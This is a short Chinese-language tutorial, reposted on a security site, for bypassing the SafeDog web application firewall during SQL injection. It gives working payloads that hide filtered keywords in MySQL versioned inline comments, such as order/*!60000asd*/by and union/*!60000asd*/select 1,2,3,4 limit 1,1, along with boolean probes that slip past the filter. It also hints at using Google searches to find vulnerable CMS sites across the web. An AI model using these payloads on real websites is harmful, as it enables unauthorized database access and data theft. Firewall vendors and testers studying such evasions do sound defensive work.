安基网 首页 安全 攻防实践 查看内容

通杀Bypass安全狗

2020-9-28 08:30| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 前言 主流浏览器安装谷歌助手插件。 分享谷歌找通杀技巧。 Bypass最简单的技巧。原理今天要说的通杀漏洞主要是SQL注入,其次是遇到WAF以后,如何Bypass。 SQL注入的原理必须要熟记于心: 用户能够控制输入数据 。 能够将用户输入的数据拼接进去执行。流程首先搭建一个完整的靶场安全狗+存在SQL的cmsPlaylo ...

前言


主流浏览器安装谷歌助手插件。

分享谷歌找通杀技巧。

Bypass最简单的技巧。

原理

今天要说的通杀漏洞主要是SQL注入,其次是遇到WAF以后,如何Bypass。

SQL注入的原理必须要熟记于心:

用户能够控制输入数据 。

能够将用户输入的数据拼接进去执行。


流程

首先搭建一个完整的靶场

安全狗+存在SQL的cms

Playload

这里先说一下payload:

/*!60000asd*/ WAF过滤哪些关键词就写在哪些中间,例如:order/*!60000sad*/by 1 或 系统函数:user/**/() 或 database/**/(),等

/*!*/ 属于内联注释

asd 属于填充代码,必须有,可以随便输

60000 属于数据库版本号,为5位数,可换成其他5位数号码(只要能过狗)

开始

and 1=1 拦截

and -1=-1 不拦截

and 1=2 拦截

and -1=-2 不拦截

报错存在注入,既然确定存在注入,就直接order by。

存在WAF,安全狗,利用上面我提到的语句来绕过。

order/*!60000asd*/by 字段数 limit 1,1

直接联合查询

正常的直接被拦截

老规矩

union/*!60000asd*/select 1,2,3,4 limit 1,1

成功绕过

执行系统函数也是同样思路




小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6877105246728880655/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部